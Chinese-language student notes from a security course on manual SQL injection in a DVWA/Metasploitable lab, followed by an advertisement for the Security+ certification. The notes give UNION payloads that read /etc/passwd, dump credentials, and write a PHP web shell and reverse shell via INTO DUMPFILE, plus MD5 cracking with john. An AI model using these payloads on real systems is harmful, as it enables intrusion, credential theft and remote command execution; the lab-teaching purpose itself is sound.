【安全牛學習筆記】手動漏洞挖掘-SQL注入

手動漏洞挖掘-SQL注入

root@kali:~# john --format=raw-MD5 dvwa.txt

root@kali:~# cd .john/

root@kali:~/.john# ls

john.log  john.pot

root@kali:~/.john# cat john.log

root@kali:~/.john# cat john.pot

root@kali:~/.john# rm *       //刪除破解日誌，才能進行下面的工作

root@kali:~/.john# john --format=raw-MD5 dvwa.txt

手動漏洞挖掘-----SQL注入

讀取文件

    'union SELECT null,load_file('/etc/passwd')--+

寫入文件

    'union select null,"<?php passthru($_GET['cmd']);?>" INTO DUMPFILE "/var/www/a.php"--+

    Mysql賬號

    cat php-revers-shell.php | xxd -ps | tr -d '\n'

    'union select null, (0x3c3f706870) INTO DUMPFILE '/tmp/x.php'--

保存下載數據庫

    'union select ull,concat(user,0x3a,password) from users INTO OUTFILE '/tmp/a.db'--

root@kali:~# ssh [email protected]

msfadmin@metasploitbale:~$ cd /var/

msfadmin@metasploitbale:/var$ cd www/

msfadmin@metasploitbale:/var/www$ ls

1.php  dvwa       mutillidea   phpMyAdmin  tikiwiki    twiki

dva    index.php  phpinfo.php  test        tikiwiki-old

msfadmin@metasploitbale:/var/www/$ cd dvwa/

msfadmin@metasploitbale:/var/www/dvwa$ ls

about.php      dvwa         index.php         php.ini

GHANGELOG.txt  external     instructions.php  README.txt

config         favicon.ico  login.php         roubots.txt

COPYING.txt    hackable     logout.php        security.php

docs           ids_log.php  phpinfo.php       setup.php

msfadmin@metasploitbale:/var/www/dvwa$ suodo find / -name a.php

msfadmin@metasploitbale:/var/www/dvwa$ cd /var/lib/mysql/

msfadmin@metasploitbale:/var/lib/mysql$ ls -l

msfadmin@metasploitbale:/var/lib/mysql$ sudo -i

root@metasploitbale:/var/lib/mysql/dvwa# ls

a.php    guestbook.frm  gusetbook.MYI  users.MYD

db.opt   guestbook.MYD  users.frm      users.MYI

root@metasploitbale:/var/lib/mysql/dvwa# cat a.php

<?php passthru($_GET['cmd']);?>root@metasploitbale:/var/lib/mysql/dvwa#

root@metasploitbale:/var/lib/mysql/dvwa# ls -l

root@metasploitbale:/var/lib/mysql/dvwa# cat /etc/passwd | grep mysql

mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/lib/false

root@metasploitbale:/var/lib/mysql/dvwa# cd /var/www/

root@metasploitbale:/var/www# ls -ld /tmp

root@metasploitbale:/var/www# cd /tmp/

root@metasploitbale:/tmp# ls -l a.php 

root@metasploitbale:/tmp# ps aux | grep mysql

root@kali:~# cp /user/share/webshells/php/

findsock.c               php-findsock-shell.php  qsd-php-backdoor.php

php-backdoor.php         php-reverse-shell.php   simple-backdoor.php

root@kali:~# cp /user/share/webshells/php/php-reverse-shell.php ./b.php

root@kali:~# ls

b.php  dvwa.txt  公共  模板  視頻  圖片  文檔  下載  音樂  桌面

root@kali:~# vi b.php

root@kali:~# cat b.php

root@kali:~# cat b.php | xxd -ps      固定一行顯示

root@kali:~# cat b.php | xxd -ps | tr -d '\n'          刪除換行符

root@metasploitbale:~# cd /tmp/

root@metasploitbale:/tmp# cat a.php

<?php passthru($_GET['cmd']);?>root@metasploitbale:/var/lib/mysql/dvwa#

root@kali:~# vi c.php

<?php passthru($_GET['cmd']);?>

root@kali:~# cat c.php | xxd -ps | tr -d '\n'

手動漏洞挖掘-----SQL注入

一個思路: 編寫服務器端代碼

    ‘union select null,'<?php if(isset($_POST["submit"])){$userID = $_POST["userID"];

    $first_name = $_POST["first_name"];$last_name = $_POST["last_name"];$username =

    $_POST["username"];$avatar = $_POST["avatar"]; echo "userID: $userID<BR>"; echo

    "first_name: $first_name<BT>"; echo "last_name: $last_name<BR>"; echo "username:

    $username<BR>"; echo "avatar: $avatar<BR>";

    $con=mysqli_connect("127.0.0.1","root","dvwa"); if(mysql_connect_errno()) {echo

    "Failed to connect to MYSQL:" .mysqli_connect_error();} else{echo "Connected to

    database<BR>";} $password = "123"; $sql="insert into dvwa.users values

    (\\"$userID\\",\\"$first_name\\",\\"$last_name\\",\\"$username\\",MD5(\\"$pass

    word\\",\\"$avatar\\")"; if(mysqli_query($con,$sql)) {echo "[Successful Insertion]:

    $sql";} else { echo "Error creating database:". mysql_error($con);}

    mysql_close($con);} ?><form method="post" action="<?php echo

    $_SERVER["PHP_SELF"];?>"><input type="text" name="userID" value="33"><br> <input

    type="text" name="first_name" value="fh"><br> <input type="text" name="last_name"

    value="y"><br> <input type="text" name="username" value="yfh"><br> <input

    type="text" name="avatar" value"yfh"><br> <input type="submit" name="submit"

    value="Submit Form"><br> </form>'INTO DUMPFILE'/tmp/user.php'--

該筆記爲安全牛課堂學員筆記，想看此課程或者信息安全類乾貨可以移步到安全牛課堂

Security+認證爲什麼是互聯網+時代最火爆的認證？

      牛妹先給大家介紹一下Security+

        Security+ 認證是一種中立第三方認證，其發證機構爲美國計算機行業協會CompTIA ；是和CISSP、ITIL 等共同包含在內的國際 IT 業 10 大熱門認證之一，和CISSP偏重信息安全管理相比，Security+ 認證更偏重信息安全技術和操作。

       通過該認證證明了您具備網絡安全，合規性和操作安全，威脅和漏洞，應用程序、數據和主機安全，訪問控制和身份管理以及加密技術等方面的能力。因其考試難度不易，含金量較高，目前已被全球企業和安全專業人士所普遍採納。

Security+認證如此火爆的原因？  

       原因一：在所有信息安全認證當中，偏重信息安全技術的認證是空白的， Security+認證正好可以彌補信息安全技術領域的空白 。

      目前行業內受認可的信息安全認證主要有CISP和CISSP，但是無論CISP還是CISSP都是偏重信息安全管理的，技術知識講的寬泛且淺顯，考試都是一帶而過。而且CISSP要求持證人員的信息安全工作經驗都要5年以上，CISP也要求大專學歷4年以上工作經驗，這些要求無疑把有能力且上進的年輕人的持證之路堵住。在現實社會中，無論是找工作還是升職加薪，或是投標時候報人員，認證都是必不可少的，這給年輕人帶來了很多不公平。而Security+的出現可以掃清這些年輕人職業發展中的障礙，由於Security+偏重信息安全技術，所以對工作經驗沒有特別的要求。只要你有IT相關背景，追求進步就可以學習和考試。

       原因二： IT運維人員工作與翻身的利器。

       在銀行、證券、保險、信息通訊等行業，IT運維人員非常多，IT運維涉及的工作面也非常廣。是一個集網絡、系統、安全、應用架構、存儲爲一體的綜合性技術崗。雖然沒有程序猿們“生當做光棍，死亦寫代碼”的悲壯，但也有着“鋤禾日當午，不如運維苦“的感慨。天天對着電腦和機器，時間長了難免有對於職業發展的迷茫和困惑。Security+國際認證的出現可以讓有追求的IT運維人員學習網絡安全知識，掌握網絡安全實踐。職業發展朝着網絡安全的方向發展，解決國內信息安全人才的匱乏問題。另外，即使不轉型，要做好運維工作，學習安全知識取得安全認證也是必不可少的。

        原因三：接地氣、國際範兒、考試方便、費用適中！

CompTIA作爲全球ICT領域最具影響力的全球領先機構,在信息安全人才認證方面是專業、公平、公正的。Security+認證偏重操作且和一線工程師的日常工作息息相關。適合銀行、證券、保險、互聯網公司等IT相關人員學習。作爲國際認證在全球147個國家受到廣泛的認可。

        在目前的信息安全大潮之下，人才是信息安全發展的關鍵。而目前國內的信息安全人才是非常匱乏的，相信Security+認證一定會成爲最火爆的信息安全認證。